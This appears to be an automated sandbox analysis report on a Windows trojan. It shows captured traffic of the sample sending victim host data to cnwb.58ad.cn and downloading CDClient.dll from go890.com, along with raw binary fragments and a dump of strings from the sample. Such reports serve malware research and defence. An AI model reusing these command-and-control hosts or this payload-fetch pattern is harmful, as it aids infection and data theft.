Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/5.5.27
Set-Cookie: PHPSESSID=98vb0q0l9p2151g3helo8edbb1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Encoding: gzip
1000a..............w.$.q&.U.@../.f..E0...A.HH........f..LwO....=Y6s@..;...duuu......_..W....._~..ur........6...}.........q\.A...VQ[.~..}...z.........[...~.U.t...Q.I....../h9.....[...o..>..5..<.w......".Nvg..]....e{.........%..?*.7..Kq...-...E..sS...."..^ ..........1.?..nU.........S......;.W.6.v<.\.O.9...v...1.... ..uw....$...M.........w.....v..\..r...{....u....n.\......0..T.?.6@F......P.A..W.}. ......_V...B|.%........3.es8..u..].0..?..}...M..I_...~....&(................... ...u_...c..^...cr6k.o~n..|..56w....}&..fC}.....G.........N..l.UP,v.....=*.....Y5..*v....gz..M.....c;6..M......q...(....r.bs....^.........?..v....]...g.7E.<.O@^S...../......:(,"..4........!n...l.....mV%I....^.<m.e...~.i..V}E!...d)N......."iz3..G.....?......di.;...ATy.>.....&...D./...H.v.....<4..6.<#......s.p]o.D.o._..?..L................:...G.....f..YR.G0.?..4.Gl..6...K$i)..b......"*.fo^.[.._.Z~...O...~.......1.].........v}P.....&....h7.7.....K........M:.r...>N....,....Y...?............vk.=.u..]W4..G..../.9N.>.......h.....6..].....o./.p...j.]r....o...e...G.ti.....&.|......5..E......#i..V.CPe.<...._.w.E...j..o[7M...*nn....7/...xW..1}...A.c}.3..=.........C.....n.....F..9-..O..b.a.....YT..........-...u.......]w......#!.n.......].!y...}...T......|.XT.....e..8......I....?<..S......]..!.....(.T.....6...K........7~.u..s..wG...~m...VlM...W..-&...M.D......L....PG.."Q......&.......u.....i.......}.. ..(...b..[S.5.'39Q....j3......~.....o?.7..h.G.....{.?....Y....|....2K........%..`.. .*...@/..pP.7..%UR...}..dXL#.5#Y.E...
<<< skipped >>>
GET / HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.ip138.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Fri, 02 Sep 2016 03:31:31 GMT
Content-Length: 18524
Content-Type: text/html
Content-Location: hXXp://VVV.ip138.com/index.htm
Last-Modified: Fri, 19 Aug 2016 02:18:00 GMT
Accept-Ranges: bytes
ETag: "864aa0e8bff9d11:4406"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Age: 51315
X-Via: 1.1 db77:5 (Cdn Cache Server V2.0)
Connection: keep-alive
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">..<html>..<head>..<meta http-equiv="Content-Type" content="text/html; charset=gb2312">..<meta name="mobile-agent"content="format=html5; url=hXXp://m.ip138.com/">..<title>IP........--.................. | ............ | ............ | ........................</title>..<meta name="Keywords" content="ip,IP....,IP........,ip138">..<meta name="Description" content="ip,IP....,IP........,ip138">..<script language="javascript">..<!--..if(window.top!=window.self)window.top.location.href='hXXp://VVV.ip138.com/';..function checkIP()..{...var ipArray,ip,j;...ip = document.ipform.ip.value;...if (ip.indexOf(" ")>=0){3....ip = ip.replace(/ /g,"");....document.ipform.ip.value = ip;...}...if (ip.toLowerCase().indexOf("http://")==0){....ip = ip.slice(7);....document.ipform.ip.value = ip;...}...if (ip.toLowerCase().indexOf("hXXps://")==0){....ip = ip.slice(8);....document.ipform.ip.value = ip;...}...if (ip.slice(ip.length-1)=="/"){....ip = ip.slice(0,ip.length-1);....document.ipform.ip.value = ip;...}...if(/[A-Za-z_-]/.test(ip)){....if(!/^([\w-] \.) ((ac)|(ad)|(ae)|(af)|(ag)|(ai)|(al)|(am)|(an)|(ao)|(aq)|(ar)|(as)|(asia)|(at)|(au)|(aw)|(az)|(ba)|(band)|(bb)|(bd)|(be)|(bf)|(bg)|(bh)|(bi)|(bid)|(biz)|(bj)|(bm)|(bn)|(bo)|(br)|(bs)|(bt)|(bv)|(bw)|(by)|(bz)|(ca)|(cc)|(cd)|(cf)|(cg)|(ch)|(ci)|(ck)|(cl)|(click)|(club)|(cm)|(cn)|(co)|(co\.in)|(co\.nz)|(co\.uk)|(com)|(com\.ag)|(com\.br)|(com\.bz)|(com\.cn)|(com\.c
<<< skipped >>>
POST /index/eventup.html HTTP/1.0
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 368
Cache-control: no-cache
Host: cnwb.58ad.cn
Accept: text/html, */*
User-Agent: Mozilla/3.0 (compatible; Indy Library)
event={"info":{"pid":1,"pip":"194.242.96.226","cid":"7F4E176E87AAF89EB8728D99FFA86566","cip":"192.168.11.131","type":2,"source":"EXE:2.0.0.30,DLL:2.0.1.7
","quantity":1,"time":1472820454,"code":"5636xanewong!Q@W#E"},"data":{"os":30,"game":0,"charge":0,"adv":0,"nodisk":0,"film":0,"culture":0,"police":0,"fire":0,"brower":0,"other":"EXE:2.0.0.30,DLL:2.0.1.7"}}
HTTP/1.1 200 OK
Server: nginx/1.6.0
Date: Fri, 02 Sep 2016 17:46:55 GMT
Content-Type: text/html;charset=utf-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.5.27
Set-Cookie: PHPSESSID=n8g9o4ccsvmpb5jvqbe7kelie6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
1..
GET /d2/CDClient.dll HTTP/1.1
Host: VVV.go890.com
Accept: text/html, */*
User-Agent: Mozilla/3.0 (compatible; Indy Library)
HTTP/1.1 200 OK
Date: Fri, 02 Sep 2016 14:02:18 GMT
Server: kangle/2.9.6
Last-Modified: Fri, 02 Sep 2016 11:43:04 GMT
Content-Type: application/octet-stream
Content-Length: 825856
Age: 1
X-Via: 1.1 fuzhou183:2 (Cdn Cache Server V2.0), 1.1 db78:1 (Cdn Cache Server V2.0)
Connection: keep-alive
DUP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................f....................@.................................................................................................................................................................................................CODE.....p.......n......PEC2^O...... ....rsrc....0.......&...r.............. ....reloc..............................@.......................................................................................................................................................................................................................................................................................................................................................................................................................b.. .........c....X.........b..._.....J>b.d.I.....i5.R......-.X.,So.....Wp.eAbk......7i.....8x......j...o$.f....e.Xa...V....b.C.n...9H..TC.J-......].L .b|C.*{?..@...a..w..Q.s...."..\...3KO.w.....V.....^.#b.l......<.q.C<.......].6..t..E..s.oT.f0...vn.=.l.D.....6\@..Cg.B.._.I5O.......K...}.$....Gi..A>.L..j3..{..=.....Q.fG.{...?.A.G.q...Q............9..\..R.......O.....X}.F.....D.Z...4.[S$..T(C/.t.x.J6..F.?./?..\.7..i...;...L%Z.b.sC5....i.7`~h...S."._.b...fwp...V.......Z..!.}.iCG..V.. .;;....V&
<<< skipped >>>
Map
The Trojan connects to the servers at the folowing location(s):
Strings from Dumps
%original file name%.exe_1832:
.idata
.idata
.rdata
.rdata
P.reloc
P.reloc
P.rsrc
P.rsrc
.aspack
.aspack
.adata
.adata
kernel32.dll
kernel32.dll
$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)
$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)
oleaut32.dll
oleaut32.dll
EVariantBadIndexError
EVariantBadIndexError
u%CNu
u%CNu
%s[%d]
%s[%d]
getservbyport
getservbyport
WSAAsyncGetServByPort
WSAAsyncGetServByPort
WSAJoinLeaf
WSAJoinLeaf
WS2_32.DLL
WS2_32.DLL
127.0.0.1
127.0.0.1
TIdSocketListWindows
TIdSocketListWindows
TIdStackWindowsU
TIdStackWindowsU
IdStackWindows
IdStackWindows
%s, %.2d %s %.4d %s %s
%s, %.2d %s %.4d %s %s
%s, %d %s %d %s %s
%s, %d %s %d %s %s
TIdEncoder3to4.Encode: Calculated length exceeded (expected
TIdEncoder3to4.Encode: Calculated length exceeded (expected
%Program Files%\Borland\Delphi7\Source\Indy\Source\IdCoder3to4.pas
%Program Files%\Borland\Delphi7\Source\Indy\Source\IdCoder3to4.pas
TIdEncoder3to4.Encode: Calculated length not met (expected
TIdEncoder3to4.Encode: Calculated length not met (expected
password
password
Password
Password
IdHTTPHeaderInfo
IdHTTPHeaderInfo
ProxyPassword
ProxyPassword
ProxyPort
ProxyPort
Mozilla/3.0 (compatible; Indy Library)
Mozilla/3.0 (compatible; Indy Library)
ftpTransfer
ftpTransfer
ftpReady
ftpReady
ftpAborted
ftpAborted
ClientPortMin
ClientPortMin
ClientPortMax
ClientPortMax
Port
Port
EIdCanNotBindPortInRange
EIdCanNotBindPortInRange
EIdInvalidPortRangeSVW
EIdInvalidPortRangeSVW
libeay32.dll
libeay32.dll
ssleay32.dll
ssleay32.dll
SSL_CTX_use_PrivateKey_file
SSL_CTX_use_PrivateKey_file
SSL_CTX_use_certificate_file
SSL_CTX_use_certificate_file
SSL_get_peer_certificate
SSL_get_peer_certificate
SSL_CTX_set_default_passwd_cb
SSL_CTX_set_default_passwd_cb
SSL_CTX_set_default_passwd_cb_userdata
SSL_CTX_set_default_passwd_cb_userdata
SSL_CTX_check_private_key
SSL_CTX_check_private_key
X509_STORE_CTX_get_current_cert
X509_STORE_CTX_get_current_cert
des_set_key
des_set_key
saUsernamePassword
saUsernamePassword
Password
Password
0.0.0.1
0.0.0.1
TIdTCPConnection
TIdTCPConnection
TIdTCPConnection|
TIdTCPConnection|
IdTCPConnection
IdTCPConnection
EIdTCPConnectionError
EIdTCPConnectionError
sslvrfFailIfNoPeerCert
sslvrfFailIfNoPeerCert
TPasswordEvent
TPasswordEvent
Certificate
Certificate
RootCertFile
RootCertFile
CertFile
CertFile
KeyFile
KeyFile
OnGetPasswordP
OnGetPasswordP
EIdOSSLLoadingRootCertError
EIdOSSLLoadingRootCertError
EIdOSSLLoadingCertError
EIdOSSLLoadingCertError
EIdOSSLLoadingKeyError
EIdOSSLLoadingKeyError
TIdTCPClient
TIdTCPClient
IdTCPClient
IdTCPClient
BoundPort
BoundPort
PortU
PortU
CommentURL
CommentURL
TIdHTTPMethod
TIdHTTPMethod
IdHTTP
IdHTTP
TIdHTTPOption
TIdHTTPOption
TIdHTTPOptions
TIdHTTPOptions
TIdHTTPProtocolVersion
TIdHTTPProtocolVersion
TIdHTTPOnRedirectEvent
TIdHTTPOnRedirectEvent
TIdHTTPResponse
TIdHTTPResponse
TIdHTTPRequest
TIdHTTPRequest
TIdHTTPRequest
TIdHTTPRequest
TIdHTTPProtocolPIC
TIdHTTPProtocolPIC
TIdCustomHTTP
TIdCustomHTTP
TIdCustomHTTPPIC
TIdCustomHTTPPIC
TIdHTTP8KC
TIdHTTP8KC
TIdHTTP
TIdHTTP
HTTPOptions
HTTPOptions
Port ;C
Port ;C
EIdHTTPProtocolException
EIdHTTPProtocolException
application/x-www-form-urlencoded
application/x-www-form-urlencoded
HTTPS
HTTPS
https
https
This request method is supported in HTTP 1.1
This request method is supported in HTTP 1.1
HTTP/1.0 200 OK
HTTP/1.0 200 OK
HTTP/
HTTP/
%d.%d.%d.%d
%d.%d.%d.%d
;8=$:$:$;
;8=$:$:$;
KERNEL32.DLL
KERNEL32.DLL
1.2.8
1.2.8
&tn
&tn
&unc
&unc
&vendor
&vendor
&
&
&
&
&
&
&
&
&&
&&
&
&
&
&
&
&
&Error
&Error